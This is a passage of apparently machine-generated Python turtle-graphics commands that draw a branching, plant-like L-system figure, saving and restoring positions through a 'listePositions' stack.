right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((176.83,269.20)), setheading(337.5) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((118.73,286.64), 22.5), ((150.73,286.64), 337.5), ((192.83,269.20), 337.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((192.83,269.20)), setheading(337.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((118.73,286.64), 22.5), ((150.73,286.64), 337.5), ((192.83,269.20), 0.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((192.83,269.20)), setheading(0.0) ;
pu(), setposition((150.73,286.64)), setheading(337.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((118.73,286.64), 22.5), ((150.73,286.64), 0.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((118.73,286.64), 22.5), ((150.73,286.64), 0.0), ((165.51,292.76), 0.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((165.51,292.76)), setheading(0.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((118.73,286.64), 22.5), ((150.73,286.64), 0.0), ((165.51,292.76), 22.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((165.51,292.76)), setheading(22.5) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((118.73,286.64), 22.5), ((150.73,286.64), 0.0), ((181.51,292.76), 337.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((181.51,292.76)), setheading(337.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((118.73,286.64), 22.5), ((150.73,286.64), 0.0), ((181.51,292.76), 0.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((181.51,292.76)), setheading(0.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((118.73,286.64), 22.5), ((150.73,286.64), 0.0), ((196.29,286.64), 315.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((196.29,286.64)), setheading(315.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((118.73,286.64), 22.5), ((150.73,286.64), 0.0), ((196.29,286.64), 337.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((196.29,286.64)), setheading(337.5) ;
pu(), setposition((150.73,286.64)), setheading(0.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((118.73,286.64), 22.5), ((165.51,292.76), 0.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((165.51,292.76)), setheading(0.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((118.73,286.64), 22.5), ((165.51,292.76), 22.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((165.51,292.76)), setheading(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((118.73,286.64), 22.5), ((180.29,298.89), 0.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((180.29,298.89)), setheading(0.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((118.73,286.64), 22.5), ((180.29,298.89), 22.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((180.29,298.89)), setheading(22.5) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((118.73,286.64), 22.5), ((180.29,298.89), 0.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((118.73,286.64), 22.5), ((180.29,298.89), 0.0), ((195.08,292.76), 315.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((195.08,292.76)), setheading(315.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((118.73,286.64), 22.5), ((180.29,298.89), 0.0), ((195.08,292.76), 337.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((195.08,292.76)), setheading(337.5) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((118.73,286.64), 22.5), ((180.29,298.89), 0.0), ((211.08,292.76), 337.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((211.08,292.76)), setheading(337.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((118.73,286.64), 22.5), ((180.29,298.89), 0.0), ((211.08,292.76), 0.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((211.08,292.76)), setheading(0.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((118.73,286.64), 22.5), ((180.29,298.89), 0.0), ((225.86,298.89), 0.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((225.86,298.89)), setheading(0.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((118.73,286.64), 22.5), ((180.29,298.89), 0.0), ((225.86,298.89), 22.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((225.86,298.89)), setheading(22.5) ;
pu(), setposition((180.29,298.89)), setheading(0.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((118.73,286.64), 22.5), ((180.29,298.89), 22.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((118.73,286.64), 22.5), ((180.29,298.89), 22.5), ((191.61,310.20), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((191.61,310.20)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((118.73,286.64), 22.5), ((180.29,298.89), 22.5), ((191.61,310.20), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((191.61,310.20)), setheading(45.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((118.73,286.64), 22.5), ((180.29,298.89), 22.5), ((206.39,316.32), 0.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((206.39,316.32)), setheading(0.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((118.73,286.64), 22.5), ((180.29,298.89), 22.5), ((206.39,316.32), 22.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((206.39,316.32)), setheading(22.5) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((118.73,286.64), 22.5), ((180.29,298.89), 22.5), ((222.39,316.32), 337.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((222.39,316.32)), setheading(337.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((118.73,286.64), 22.5), ((180.29,298.89), 22.5), ((222.39,316.32), 0.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((222.39,316.32)), setheading(0.0) ;
pu(), setposition((180.29,298.89)), setheading(22.5) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((118.73,286.64), 22.5), ((191.61,310.20), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((191.61,310.20)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((118.73,286.64), 22.5), ((191.61,310.20), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((191.61,310.20)), setheading(45.0) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((118.73,286.64), 22.5), ((202.92,321.51), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((202.92,321.51)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((118.73,286.64), 22.5), ((202.92,321.51), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((202.92,321.51)), setheading(45.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((118.73,286.64), 22.5), ((202.92,321.51), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((118.73,286.64), 22.5), ((202.92,321.51), 22.5), ((218.92,321.51), 337.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((218.92,321.51)), setheading(337.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((118.73,286.64), 22.5), ((202.92,321.51), 22.5), ((218.92,321.51), 0.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((218.92,321.51)), setheading(0.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((118.73,286.64), 22.5), ((202.92,321.51), 22.5), ((233.70,327.64), 0.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((233.70,327.64)), setheading(0.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((118.73,286.64), 22.5), ((202.92,321.51), 22.5), ((233.70,327.64), 22.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((233.70,327.64)), setheading(22.5) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((118.73,286.64), 22.5), ((202.92,321.51), 22.5), ((245.02,338.95), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((245.02,338.95)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((118.73,286.64), 22.5), ((202.92,321.51), 22.5), ((245.02,338.95), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((245.02,338.95)), setheading(45.0) ;
pu(), setposition((202.92,321.51)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((118.73,286.64), 22.5), ((202.92,321.51), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((118.73,286.64), 22.5), ((202.92,321.51), 45.0), ((209.04,336.30), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((209.04,336.30)), setheading(45.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((118.73,286.64), 22.5), ((202.92,321.51), 45.0), ((209.04,336.30), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((209.04,336.30)), setheading(67.5) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((118.73,286.64), 22.5), ((202.92,321.51), 45.0), ((220.36,347.61), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((220.36,347.61)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((118.73,286.64), 22.5), ((202.92,321.51), 45.0), ((220.36,347.61), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((220.36,347.61)), setheading(45.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((118.73,286.64), 22.5), ((202.92,321.51), 45.0), ((235.14,353.73), 0.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((235.14,353.73)), setheading(0.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((118.73,286.64), 22.5), ((202.92,321.51), 45.0), ((235.14,353.73), 22.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((235.14,353.73)), setheading(22.5) ;
pu(), setposition((202.92,321.51)), setheading(45.0) ;
pu(), setposition((118.73,286.64)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((118.73,286.64), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((118.73,286.64), 45.0), ((124.85,301.42), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((124.85,301.42)), setheading(45.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((118.73,286.64), 45.0), ((124.85,301.42), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((124.85,301.42)), setheading(67.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((118.73,286.64), 45.0), ((130.98,316.20), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((130.98,316.20)), setheading(45.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((118.73,286.64), 45.0), ((130.98,316.20), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((130.98,316.20)), setheading(67.5) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((118.73,286.64), 45.0), ((130.98,316.20), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((118.73,286.64), 45.0), ((130.98,316.20), 45.0), ((145.76,322.33), 0.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((145.76,322.33)), setheading(0.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((118.73,286.64), 45.0), ((130.98,316.20), 45.0), ((145.76,322.33), 22.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((145.76,322.33)), setheading(22.5) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((118.73,286.64), 45.0), ((130.98,316.20), 45.0), ((157.07,333.64), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((157.07,333.64)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((118.73,286.64), 45.0), ((130.98,316.20), 45.0), ((157.07,333.64), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((157.07,333.64)), setheading(45.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((118.73,286.64), 45.0), ((130.98,316.20), 45.0), ((163.19,348.42), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((163.19,348.42)), setheading(45.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((118.73,286.64), 45.0), ((130.98,316.20), 45.0), ((163.19,348.42), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((163.19,348.42)), setheading(67.5) ;
pu(), setposition((130.98,316.20)), setheading(45.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((118.73,286.64), 45.0), ((130.98,316.20), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((118.73,286.64), 45.0), ((130.98,316.20), 67.5), ((130.98,332.20), 67.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((130.98,332.20)), setheading(67.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((118.73,286.64), 45.0), ((130.98,316.20), 67.5), ((130.98,332.20), 90.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((130.98,332.20)), setheading(90.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((118.73,286.64), 45.0), ((130.98,316.20), 67.5), ((137.10,346.99), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((137.10,346.99)), setheading(45.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((118.73,286.64), 45.0), ((130.98,316.20), 67.5), ((137.10,346.99), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((137.10,346.99)), setheading(67.5) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((118.73,286.64), 45.0), ((130.98,316.20), 67.5), ((148.41,358.30), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((148.41,358.30)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((118.73,286.64), 45.0), ((130.98,316.20), 67.5), ((148.41,358.30), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((148.41,358.30)), setheading(45.0) ;
pu(), setposition((130.98,316.20)), setheading(67.5) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((118.73,286.64), 45.0), ((142.29,327.52), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((142.29,327.52)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((118.73,286.64), 45.0), ((142.29,327.52), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((142.29,327.52)), setheading(45.0) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((118.73,286.64), 45.0), ((153.60,338.83), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((153.60,338.83)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((118.73,286.64), 45.0), ((153.60,338.83), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((153.60,338.83)), setheading(45.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((118.73,286.64), 45.0), ((153.60,338.83), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((118.73,286.64), 45.0), ((153.60,338.83), 22.5), ((169.60,338.83), 337.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((169.60,338.83)), setheading(337.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((118.73,286.64), 45.0), ((153.60,338.83), 22.5), ((169.60,338.83), 0.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((169.60,338.83)), setheading(0.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((118.73,286.64), 45.0), ((153.60,338.83), 22.5), ((184.39,344.95), 0.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((184.39,344.95)), setheading(0.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((118.73,286.64), 45.0), ((153.60,338.83), 22.5), ((184.39,344.95), 22.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((184.39,344.95)), setheading(22.5) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((118.73,286.64), 45.0), ((153.60,338.83), 22.5), ((195.70,356.27), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((195.70,356.27)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((118.73,286.64), 45.0), ((153.60,338.83), 22.5), ((195.70,356.27), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((195.70,356.27)), setheading(45.0) ;
pu(), setposition((153.60,338.83)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((118.73,286.64), 45.0), ((153.60,338.83), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((118.73,286.64), 45.0), ((153.60,338.83), 45.0), ((159.73,353.61), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((159.73,353.61)), setheading(45.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((118.73,286.64), 45.0), ((153.60,338.83), 45.0), ((159.73,353.61), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((159.73,353.61)), setheading(67.5) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((118.73,286.64), 45.0), ((153.60,338.83), 45.0), ((171.04,364.93), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((171.04,364.93)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((118.73,286.64), 45.0), ((153.60,338.83), 45.0), ((171.04,364.93), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((171.04,364.93)), setheading(45.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((118.73,286.64), 45.0), ((153.60,338.83), 45.0), ((185.82,371.05), 0.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((185.82,371.05)), setheading(0.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((118.73,286.64), 45.0), ((153.60,338.83), 45.0), ((185.82,371.05), 22.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((185.82,371.05)), setheading(22.5) ;
pu(), setposition((153.60,338.83)), setheading(45.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((118.73,286.64), 45.0), ((168.39,344.95), 0.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((168.39,344.95)), setheading(0.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((118.73,286.64), 45.0), ((168.39,344.95), 22.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((168.39,344.95)), setheading(22.5) ;
